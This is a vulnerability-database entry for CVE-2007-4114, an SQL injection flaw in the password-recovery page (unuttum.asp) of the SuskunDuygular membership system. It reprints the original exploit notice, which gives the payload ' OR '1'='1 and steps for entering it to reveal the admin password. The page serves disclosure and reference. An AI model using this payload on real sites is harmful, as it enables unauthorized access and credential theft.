SuskunDuygular ?yelik Sistemi Unuttum.ASP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189612 漏洞类型 SQL注入
发布时间 2007-07-31 更新时间 2007-08-01
CVE编号 CVE-2007-4114 CNNVD-ID CNNVD-200707-560
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2007080012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-560
|漏洞详情
SuskunDuygularUyelikSistemi1.2版本的unuttum.asp中存在多个SQL注入漏洞。远程攻击者可以借助(1)kadi或(2)email参数,执行任意SQL指令。
|漏洞EXP
########################################################################
#######

Olmek Var$a Kaderde Dert Ekleme Derdine Team :)

########################################################################
#######

Portal:SuskunDuygular - yelik Sistemi v.1 Sql İnjection Bug
Author:Yollubunlar
http://yollubunlar.org

########################################################################
#######

Exploit:site.com/script_path/unuttum.asp

' OR '1'='1

' OR '1'='1  2 wirte enter then we see our priv question than we write

to  ' OR '1'='1 then we see admins ' password

########################################################################
#######

Greetz : http://yollubunlar.org

########################################################################
#######
|参考资料

来源:BID
名称:25108
链接:http://www.securityfocus.com/bid/25108
来源:BUGTRAQ
名称:20070727SuskunDuygular-ÜyelikSistemiv.1Sql
链接:http://www.securityfocus.com/archive/1/archive/1/474929/100/0/threaded
来源:SECUNIA
名称:26260
链接:http://secunia.com/advisories/26260
来源:XF
名称:suskunduygular-unuttum-sql-injection(35666)
链接:http://xforce.iss.net/xforce/xfdb/35666
来源:VUPEN
名称:ADV-2007-2720
链接:http://www.frsirt.com/english/advisories/2007/2720
来源:SREASON
名称:2945
链接:http://securityreason.com/securityalert/2945